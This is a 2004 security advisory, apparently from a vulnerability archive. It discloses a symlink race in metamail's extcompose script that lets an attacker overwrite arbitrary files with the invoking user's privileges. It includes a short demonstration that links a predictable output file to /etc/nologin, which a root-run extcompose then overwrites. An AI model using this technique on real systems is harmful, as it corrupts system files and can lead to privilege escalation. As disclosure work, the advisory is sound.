what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

extcompose.txt

extcompose.txt
Posted Mar 13, 2004
Authored by Shaun Colley | Site nettwerked.co.uk

Extcompose, a function of the metamail package, fails to properly verify a file exists prior to writing to it, and will accept symbolic links, leaving it open to being an attack vector.

tags | advisory
SHA-256 | ecb0d56a71d017b5a7e9ee58f1fd7f55abb82c34705174f94c74945fd4205bde

extcompose.txt

Change Mirror Download
~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*

Product: Extcompose included with the common
metamail package.
https://bmrc.berkeley.edu/~trey/emacs/metamail.html

Versions: All
Bug: Symlink bug / race condition
Impact: Attacker's can write to arbitrary files,
and in theory, elevate privileges
Date: March 11, 2004
Author: Shaun Colley
Email: shaunige@yahoo.co.uk
WWW: https://www.nettwerked.co.uk

~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*



Introduction
#############

With the popular 'metamail' package (included in most
popular Linux distributions), there is a script
included called 'extcompose' (usually located at
/usr/bin/extcompose and /usr/bin/extcompose.sigh).

A symlink vulnerability exists in the extcompose
script, which can allow an attacker to overwrite/write
to arbitrary files with the privileges of the invoking
user, due to the fact that Extcompose does not check
that the output filename is not a symlink.

Due to the popularity of metamail, extcompose is
present on a large percentage of Linux systems.

"The extcompose program will allow a user on a
properly-equipped work-station to enter the
appropriate data to enable a mail message he is
sending to make reference to "external" data, that is,
data that is not included in the mail message itself
but is otherwise available on the network via a
suitable mechanism." - From the extcompose(1) man
page.



The bug
########

The vulnerability presents itself when extcompose
takes user-data, and writes the relevent output to the
file specified by the user on the command-line. The
extcompose script, unfortunately, does not check for
existance of the output file specified, nor does it
check for the possibility of the filename specified
being a symlink - it just *blindly* writes its output
to the file with a bunch of "echo [data] >> file"
commands.

If an attacker creates a symlink with the name of the
file specified by the invoking user of the script,
arbitrary files can be corrupted/overwritten with the
privileges of the invoking user, and in theory,
privileges could possibly be elevated.

For example, if extcompose was ran by root, and an
attacker creates a symlink to /etc/nologin, or worse
yet, results could be quite severe. An example attack
is demonstrated below.

Due to the fact that an attacker must know the
filename specified by the invoking user of extcompose
in order to create the symlink, this could be
considered a race condition (i.e the attacker might
see the unsuspecting user typing the command in an
office environment, and quickly create the symlink
using her terminal).


The exploit
############

An example exploit scenario is demonstrated below:


##
kid$ ln -s /etc/nologin /directory/mailfile

[...]

root# /usr/bin/extcompose /directory/mailfile

Where is the external data that you want this mail
message to reference?
1 -- In a local file
2 -- In an AFS file
3 -- In an anonymous FTP directory on the Internet
4 -- In an Internet FTP directory that requires a
valid login
5 -- Under the control of a mail server that will
send the data on request

Please enter a number from 1 to 5: 1

Enter the full path name for the file:
/home/shaun/outlooksploit.html
Please enter the MIME content-type for the externally
referenced data: text/plain

Is this data already encoded for email transport?
1 -- No, it is not encoded
2 -- Yes, it is encoded in base64
3 -- Yes, it is encoded in quoted-printable
4 -- Yes, it is encoded using uuencode
2

[...mailfile is written with generated MIME data...]

[...]

attack$ cat /etc/nologin
Content-type: message/external-body;
access-type=local-file;
name="/home/shaun/outlooksploit.html"

Content-type: text/plain
Content-transfer-encoding: base64
###


As demonstrated, extcompose does not safely deal with
file handling, thus presenting possibility of
exploitation to overwrite/corrupt arbitrary files with
the privileges of the user running 'extcompose'. In
theory, this could lead to escalation of privileges.


#####
NOTE:
#####

The script '/usr/bin/extcompose.sigh', which is almost
identical, is also vulnerable.



The fix
########

No fix exists. I have attempted to contacted the
author of metamail ('extcompose' is part of the
metamail package), but metamail is no longer
maintained, although it is still packaged in many
Linux distributions.


Workaround: Run 'extcompose' with a low privileged
account.



Credit
#######

Vulnerability discovered by shaun2k2 / Shaun Colley.




Thank you for your time.
Shaun.





___________________________________________________________
Yahoo! Messenger - Communicate instantly..."Ping"
your friends today! Download Messenger Now
https://uk.messenger.yahoo.com/download/index.html
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close